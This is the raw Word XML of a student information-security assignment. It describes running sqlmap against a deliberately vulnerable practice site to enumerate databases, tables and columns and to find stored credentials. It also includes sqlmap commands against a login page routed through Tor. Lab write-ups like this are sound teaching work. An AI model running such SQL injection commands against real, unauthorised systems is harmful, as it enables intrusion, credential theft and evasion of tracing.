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F2469" w14:textId="77777777" w:rsidR="00A06C86" w:rsidRDefault="00A06C86"/>
    <w:p w14:paraId="783DA64A" w14:textId="77777777" w:rsidR="00A04EAC" w:rsidRPr="00151EBA" w:rsidRDefault="00A04EAC" w:rsidP="00A06C86">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00151EBA">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">INFORMATION SECURITY </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC4C5DC" w14:textId="5F953E7B" w:rsidR="00A06C86" w:rsidRDefault="00A06C86" w:rsidP="00A06C86">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00151EBA">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00A04EAC" w:rsidRPr="00151EBA">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SSIGNMENT</w:t>
      </w:r>
      <w:r w:rsidRPr="00151EBA">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A04EAC" w:rsidRPr="00151EBA">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00151EBA">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8AD94F" w14:textId="77777777" w:rsidR="00151EBA" w:rsidRPr="00151EBA" w:rsidRDefault="00151EBA" w:rsidP="00A06C86">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F97B116" w14:textId="77777777" w:rsidR="00151EBA" w:rsidRPr="00A04EAC" w:rsidRDefault="00151EBA" w:rsidP="00A06C86">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79958ECE" w14:textId="4C66F704" w:rsidR="00A04EAC" w:rsidRPr="00551B0F" w:rsidRDefault="00A04EAC" w:rsidP="00551B0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Th</w:t>
      </w:r>
      <w:r w:rsidR="00151EBA"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 xml:space="preserve">is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00151EBA"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>is</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00151EBA"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 xml:space="preserve"> the website</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00151EBA"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 xml:space="preserve">which I used </w:t>
      </w:r>
      <w:r w:rsid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>to</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> run </w:t>
      </w:r>
      <w:r w:rsid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 xml:space="preserve">SQL Injection test </w:t>
      </w:r>
      <w:r w:rsidRPr="00151EBA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ttp://</w:t>
      </w:r>
      <w:r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testphp.vulnweb.com/artists.php?artist=1</w:t>
      </w:r>
      <w:r w:rsidR="00151EBA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GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F483E6" w14:textId="77777777" w:rsidR="00A04EAC" w:rsidRPr="00151EBA" w:rsidRDefault="00A04EAC" w:rsidP="00A06C86">
      <w:pPr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</w:p>
    <w:p w14:paraId="56C473DE" w14:textId="1FBEF9B4" w:rsidR="009235BB" w:rsidRPr="00551B0F" w:rsidRDefault="00A06C86" w:rsidP="00551B0F">
      <w:pPr>
        <w:pStyle w:val="ListBulle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I have used </w:t>
      </w:r>
      <w:r w:rsidR="00A04EAC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SQL MAP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for conducting the attack on the website. </w:t>
      </w:r>
      <w:r w:rsidR="00A04EAC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he command that I have used in this </w:t>
      </w:r>
      <w:r w:rsidR="00A04EAC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>attack using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04EAC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>SQL MAP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04EAC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on this website using this link </w:t>
      </w:r>
      <w:r w:rsidR="00A04EAC" w:rsidRPr="00A04EA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ttp://testphp.vulnweb.com/artists.php?artist=1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–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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for their database entry </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4513FA40" w14:textId="77777777" w:rsidR="00551B0F" w:rsidRPr="00551B0F" w:rsidRDefault="00551B0F" w:rsidP="00551B0F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99DDE4B" w14:textId="1064314D" w:rsidR="009235BB" w:rsidRPr="00551B0F" w:rsidRDefault="009235BB" w:rsidP="00551B0F">
      <w:pPr>
        <w:pStyle w:val="ListBulle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After</w:t>
      </w:r>
      <w:r w:rsidR="00A04EAC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using this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command </w:t>
      </w:r>
      <w:r w:rsidR="00151EBA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entry,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</w:t>
      </w:r>
      <w:r w:rsidR="00A04EAC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Kali Linux </w:t>
      </w:r>
      <w:r w:rsidR="00551B0F"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 xml:space="preserve">Number of </w:t>
      </w:r>
      <w:r w:rsidR="00551B0F"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>databases</w:t>
      </w:r>
      <w:r w:rsidR="00551B0F"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 xml:space="preserve"> found</w:t>
      </w:r>
      <w:r w:rsidR="00551B0F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00551B0F"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>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4865CA7F" w14:textId="73422C58" w:rsidR="009235BB" w:rsidRPr="00151EBA" w:rsidRDefault="00A04EAC" w:rsidP="00551B0F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proofErr w:type="spellStart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</w:p>
    <w:p w14:paraId="04164F85" w14:textId="4790A4C6" w:rsidR="009235BB" w:rsidRPr="00151EBA" w:rsidRDefault="00A04EAC" w:rsidP="00551B0F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Information Schema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66F54B93" w14:textId="77777777" w:rsidR="009235BB" w:rsidRPr="00151EBA" w:rsidRDefault="009235BB" w:rsidP="009235B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4DCF2C6" w14:textId="529E9B5E" w:rsidR="009235BB" w:rsidRPr="00551B0F" w:rsidRDefault="00A04EAC" w:rsidP="00551B0F">
      <w:pPr>
        <w:pStyle w:val="ListBulle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S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o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, I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used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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  <w:proofErr w:type="spellStart"/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byt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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typing the command,</w:t>
      </w:r>
      <w:r w:rsid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SQLMAP</w:t>
      </w:r>
      <w:r w:rsidR="009235BB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website using this link </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04EA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ttp://testphp.vulnweb.com/artists.php?artist=1</w:t>
      </w:r>
      <w:r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–</w:t>
      </w:r>
      <w:r w:rsidR="009235BB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1 –D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00551B0F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9235BB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  <w:r w:rsidR="009235BB" w:rsidRP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–tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5A7AC9" w14:textId="77777777" w:rsidR="009235BB" w:rsidRPr="00151EBA" w:rsidRDefault="009235BB" w:rsidP="009235B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B9F8C7C" w14:textId="77777777" w:rsidR="00551B0F" w:rsidRPr="00551B0F" w:rsidRDefault="00A04EAC" w:rsidP="00551B0F">
      <w:pPr>
        <w:pStyle w:val="ListBulle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T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ables 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were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used to get the table of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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  <w:r w:rsidR="009235BB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r w:rsidR="00151EBA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In this way I got the tables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51EBA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and data inside them</w:t>
      </w:r>
      <w:r w:rsidR="00551B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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01638860" w14:textId="2175B4A3" w:rsidR="00551B0F" w:rsidRPr="00151EBA" w:rsidRDefault="00551B0F" w:rsidP="00551B0F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:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>C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>oulmns found in a table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1925373B" w14:textId="1B71C75B" w:rsidR="009235BB" w:rsidRPr="00551B0F" w:rsidRDefault="00551B0F" w:rsidP="00551B0F">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr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  <w:lang w:val="en-PK" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>found username and a password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C48D7A" w14:textId="77777777" w:rsidR="008932C3" w:rsidRPr="00151EBA" w:rsidRDefault="008932C3" w:rsidP="008932C3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A596F44" w14:textId="47512944" w:rsidR="008932C3" w:rsidRPr="00151EBA" w:rsidRDefault="00151EBA" w:rsidP="00551B0F">
      <w:pPr>
        <w:pStyle w:val="ListBulle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Then I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used the command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51B0F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SQLMAP using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this link </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04EAC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val="en-PK" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>ttp://testphp.vulnweb.com/artists.php?artist=1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and –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––D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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–T products –columns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. I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n this command products </w:t>
      </w:r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are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the table content and we have asked for the products that are in the database of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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A</w:t>
      </w:r>
      <w:r w:rsidR="008932C3"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cuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00151EBA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</w:p>
    <w:p w14:paraId="2B10BB77" w14:textId="76454D32" w:rsidR="004567F3" w:rsidRPr="00551B0F" w:rsidRDefault="00151EBA" w:rsidP="00551B0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77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lastRenderedPageBreak/>
        <w:t>SQLMAP</w:t>
      </w:r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 xml:space="preserve"> -u "http://testsite.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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" --tor --tor-type=SOCKS5</w:t>
      </w:r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ab/>
      </w:r>
      <w:r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SQLMAP</w:t>
      </w:r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-u "http://testsite.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004567F3" w:rsidRPr="00551B0F"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  <w:t>" --time-sec 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF48006" w14:textId="77777777" w:rsidR="004567F3" w:rsidRPr="00151EBA" w:rsidRDefault="004567F3" w:rsidP="008932C3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DE03E12" w14:textId="77777777" w:rsidR="008932C3" w:rsidRPr="00151EBA" w:rsidRDefault="008932C3" w:rsidP="008932C3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7D01B80" w14:textId="3FB193C4" w:rsidR="00151EBA" w:rsidRPr="00151EBA" w:rsidRDefault="00151EBA" w:rsidP="00151EBA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0D0BD42" w14:textId="62F940FA" w:rsidR="00151EBA" w:rsidRPr="00151EBA" w:rsidRDefault="00151EBA" w:rsidP="00151EBA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0F3E92E9" w14:textId="77777777" w:rsidR="00151EBA" w:rsidRPr="00151EBA" w:rsidRDefault="00151EBA" w:rsidP="00151EBA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13BEC0A5" w14:textId="77777777" w:rsidR="008932C3" w:rsidRPr="00151EBA" w:rsidRDefault="008932C3" w:rsidP="008932C3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17F13E6E" w14:textId="77777777" w:rsidR="008932C3" w:rsidRPr="00151EBA" w:rsidRDefault="008932C3" w:rsidP="008932C3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1CF4B630" w14:textId="77777777" w:rsidR="009235BB" w:rsidRPr="00151EBA" w:rsidRDefault="009235BB" w:rsidP="009235B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14:paraId="72FE1A10" w14:textId="77777777" w:rsidR="009235BB" w:rsidRPr="00151EBA" w:rsidRDefault="009235BB" w:rsidP="00A06C86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sectPr w:rsidR="009235BB" w:rsidRPr="0015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F0A8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3551E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2C6DD02"/>
    <w:lvl w:ilvl="0" w:tplc="590EF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0BDF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1940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E39AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3206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718A0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8466C10E"/>
    <w:lvl w:ilvl="0" w:tplc="7EE45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30DED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="037AD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E0457"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7DA2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B6DC5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="00D0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D1002"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="946A1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F5458"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE4EB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86"/>
    <w:rsid w:val="00151EBA"/>
    <w:rsid w:val="00305B66"/>
    <w:rsid w:val="004567F3"/>
    <w:rsid w:val="00551B0F"/>
    <w:rsid w:val="005B7493"/>
    <w:rsid w:val="008932C3"/>
    <w:rsid w:val="009235BB"/>
    <w:rsid w:val="00A04EAC"/>
    <w:rsid w:val="00A0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0468"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FF620715-4C3D-4003-8441-AECDEB69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6C8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32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7F3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4567F3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-operator">
    <w:name w:val="cm-operator"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004567F3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-string">
    <w:name w:val="cm-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004567F3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0045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number">
    <w:name w:val="cm-number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0045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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-06T17:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-13T20:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>